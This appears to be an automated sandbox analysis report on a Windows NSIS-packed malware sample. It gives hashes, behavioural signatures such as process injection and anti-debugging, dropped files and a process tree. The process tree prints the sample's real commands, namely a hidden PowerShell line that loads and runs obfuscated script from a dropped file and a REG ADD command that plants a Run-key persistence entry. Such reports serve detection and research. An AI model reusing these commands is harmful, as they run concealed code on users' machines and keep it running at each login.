Analysis
-
max time kernel
145s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
23-05-2024 01:43
Static task
static1
Behavioral task
behavioral1
Sample
8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe
Resource
win10v2004-20240426-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win7-20240508-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/nsDialogs.dll
Resource
win10v2004-20240426-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240508-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240508-en
General
-
Target
8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe
-
Size
541KB
-
MD5
93616677d7d1ebbfb979b905150bb3cd
-
SHA1
87037c76bc789909d49fa81887ce8465436f3ca0
-
SHA256
8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8
-
SHA512
cc17b5c1266c01dd8bf1d2a5269e228a3389083eca13cc1352f6638ab72a95beecc4e3a7b29d892813eb1843b0bd8b207fa987ad6224dfab6b606167946b5595
-
SSDEEP
12288:iH7MMIqb9BVAG8ITBF8qgvpnu1uo6c1yZODqCNtEplW8LmP:C7a69BVxh65K6+drGlW8LmP
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Loads dropped DLL 4 IoCs
Processes:
8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exepowershell.exeDisfranchising.exepid process 2812 8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe 2812 8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe 2492 powershell.exe 1616 Disfranchising.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Software\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Beslutningsivrighed% -windowstyle minimized $stedtes=(Get-ItemProperty -Path 'HKCU:\\Stjydsk\\').Coswearer;%Beslutningsivrighed% ($stedtes)" reg.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exeDisfranchising.exepid process 2492 powershell.exe 1616 Disfranchising.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2492 set thread context of 1616 2492 powershell.exe Disfranchising.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 2 IoCs
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\Disfranchising.exe nsis_installer_1 \Users\Admin\AppData\Local\Temp\Disfranchising.exe nsis_installer_2 -
Modifies registry key 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepid process 2492 powershell.exe 2492 powershell.exe 2492 powershell.exe 2492 powershell.exe 2492 powershell.exe 2492 powershell.exe 2492 powershell.exe 2492 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2492 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2492 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exepowershell.exeDisfranchising.execmd.exedescription pid process target process PID 2812 wrote to memory of 2492 2812 8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe powershell.exe PID 2812 wrote to memory of 2492 2812 8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe powershell.exe PID 2812 wrote to memory of 2492 2812 8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe powershell.exe PID 2812 wrote to memory of 2492 2812 8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe powershell.exe PID 2492 wrote to memory of 2352 2492 powershell.exe cmd.exe PID 2492 wrote to memory of 2352 2492 powershell.exe cmd.exe PID 2492 wrote to memory of 2352 2492 powershell.exe cmd.exe PID 2492 wrote to memory of 2352 2492 powershell.exe cmd.exe PID 2492 wrote to memory of 1616 2492 powershell.exe Disfranchising.exe PID 2492 wrote to memory of 1616 2492 powershell.exe Disfranchising.exe PID 2492 wrote to memory of 1616 2492 powershell.exe Disfranchising.exe PID 2492 wrote to memory of 1616 2492 powershell.exe Disfranchising.exe PID 2492 wrote to memory of 1616 2492 powershell.exe Disfranchising.exe PID 2492 wrote to memory of 1616 2492 powershell.exe Disfranchising.exe PID 1616 wrote to memory of 1648 1616 Disfranchising.exe cmd.exe PID 1616 wrote to memory of 1648 1616 Disfranchising.exe cmd.exe PID 1616 wrote to memory of 1648 1616 Disfranchising.exe cmd.exe PID 1616 wrote to memory of 1648 1616 Disfranchising.exe cmd.exe PID 1648 wrote to memory of 2284 1648 cmd.exe reg.exe PID 1648 wrote to memory of 2284 1648 cmd.exe reg.exe PID 1648 wrote to memory of 2284 1648 cmd.exe reg.exe PID 1648 wrote to memory of 2284 1648 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe"C:\Users\Admin\AppData\Local\Temp\8ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -windowstyle hidden "$Twiddly=Get-Content 'C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Samkrt.ska';$Careeristic=$Twiddly.SubString(52755,3);.$Careeristic($Twiddly)"2⤵
- Command and Scripting Interpreter: PowerShell
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c set /A 1^^0"3⤵
-
C:\Users\Admin\AppData\Local\Temp\Disfranchising.exe"C:\Users\Admin\AppData\Local\Temp\Disfranchising.exe"3⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Beslutningsivrighed% -windowstyle minimized $stedtes=(Get-ItemProperty -Path 'HKCU:\Stjydsk\').Coswearer;%Beslutningsivrighed% ($stedtes)"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Beslutningsivrighed% -windowstyle minimized $stedtes=(Get-ItemProperty -Path 'HKCU:\Stjydsk\').Coswearer;%Beslutningsivrighed% ($stedtes)"5⤵
- Adds Run key to start application
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Erstatningssagerne.KlaFilesize
278KB
MD54f78e43df25c818fd771e53a4a20ff12
SHA15760d9a9a52598353829595bd4df180a08377a12
SHA2567a3580d146706d7ee3430c8e06dbaa24ede269bcbd67a4936dabae9ed904c415
SHA512eb5c82bc6766a71654ebbeafd4df40e8d3519660c0529337da453ac5c5edc18ae0ae3cf3303b0bfee6f5a3085dc34c6e04dfc03f30b69003bdedaaa19acf0d3a
-
C:\Users\Admin\AppData\Local\nondefence\kledyrenes\mesoblastema\Samkrt.skaFilesize
51KB
MD5afd9c594ed116f7cdfe6c432ce10ff17
SHA1a685bf1da29f74b5c9ac802b51a6c5e75a888285
SHA2564832ff867a3915d5958b2d072fc93076f940f654c04f6bba8c9f80b8ea789dfb
SHA51205738b6c609f28615f8d7c6725885fd44fe54370f8880385dc5056ff0c37525e7add80747ae657ea0c45f40932ded22c6099122f9dc7ebdad14145f513722917
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\degum.lnkFilesize
890B
MD5b4fef5471fddd48700b7aea5b3ac12ce
SHA1a272b375ee5a7a1709d0c913a85f59ebd68695e5
SHA256ea71ef3c6fa0f98b7bc764685d8284f5878cf3d6f25c8989911be76d29f84916
SHA512d430702ce350d10bc815db44a40b251e7cd8e5f18ccaff7a8a743e231eb0d18530e65fb90c85e466b51368baaed2668c5ed8e340117ceae599f6d5d5d2003033
-
\Users\Admin\AppData\Local\Temp\Disfranchising.exeFilesize
541KB
MD593616677d7d1ebbfb979b905150bb3cd
SHA187037c76bc789909d49fa81887ce8465436f3ca0
SHA2568ca8c891e95359312e0a42f1f00fe42eefb662f66a61715ead3865d27fbe27e8
SHA512cc17b5c1266c01dd8bf1d2a5269e228a3389083eca13cc1352f6638ab72a95beecc4e3a7b29d892813eb1843b0bd8b207fa987ad6224dfab6b606167946b5595
-
\Users\Admin\AppData\Local\Temp\nsy840F.tmp\nsDialogs.dllFilesize
9KB
MD51c8b2b40c642e8b5a5b3ff102796fb37
SHA13245f55afac50f775eb53fd6d14abb7fe523393d
SHA2568780095aa2f49725388cddf00d79a74e85c9c4863b366f55c39c606a5fb8440c
SHA5124ff2dc83f640933162ec8818bb1bf3b3be1183264750946a3d949d2e7068ee606277b6c840193ef2b4663952387f07f6ab12c84c4a11cae9a8de7bd4e7971c57
-
memory/1616-75-0x0000000000400000-0x0000000001462000-memory.dmpFilesize
16.4MB
-
memory/1616-74-0x0000000000400000-0x0000000001462000-memory.dmpFilesize
16.4MB
-
memory/2492-63-0x0000000073900000-0x0000000073EAB000-memory.dmpFilesize
5.7MB
-
memory/2492-62-0x0000000073900000-0x0000000073EAB000-memory.dmpFilesize
5.7MB
-
memory/2492-67-0x0000000073900000-0x0000000073EAB000-memory.dmpFilesize
5.7MB
-
memory/2492-69-0x0000000006160000-0x000000000A653000-memory.dmpFilesize
68.9MB
-
memory/2492-61-0x0000000073900000-0x0000000073EAB000-memory.dmpFilesize
5.7MB
-
memory/2492-60-0x0000000073900000-0x0000000073EAB000-memory.dmpFilesize
5.7MB
-
memory/2492-59-0x0000000073901000-0x0000000073902000-memory.dmpFilesize
4KB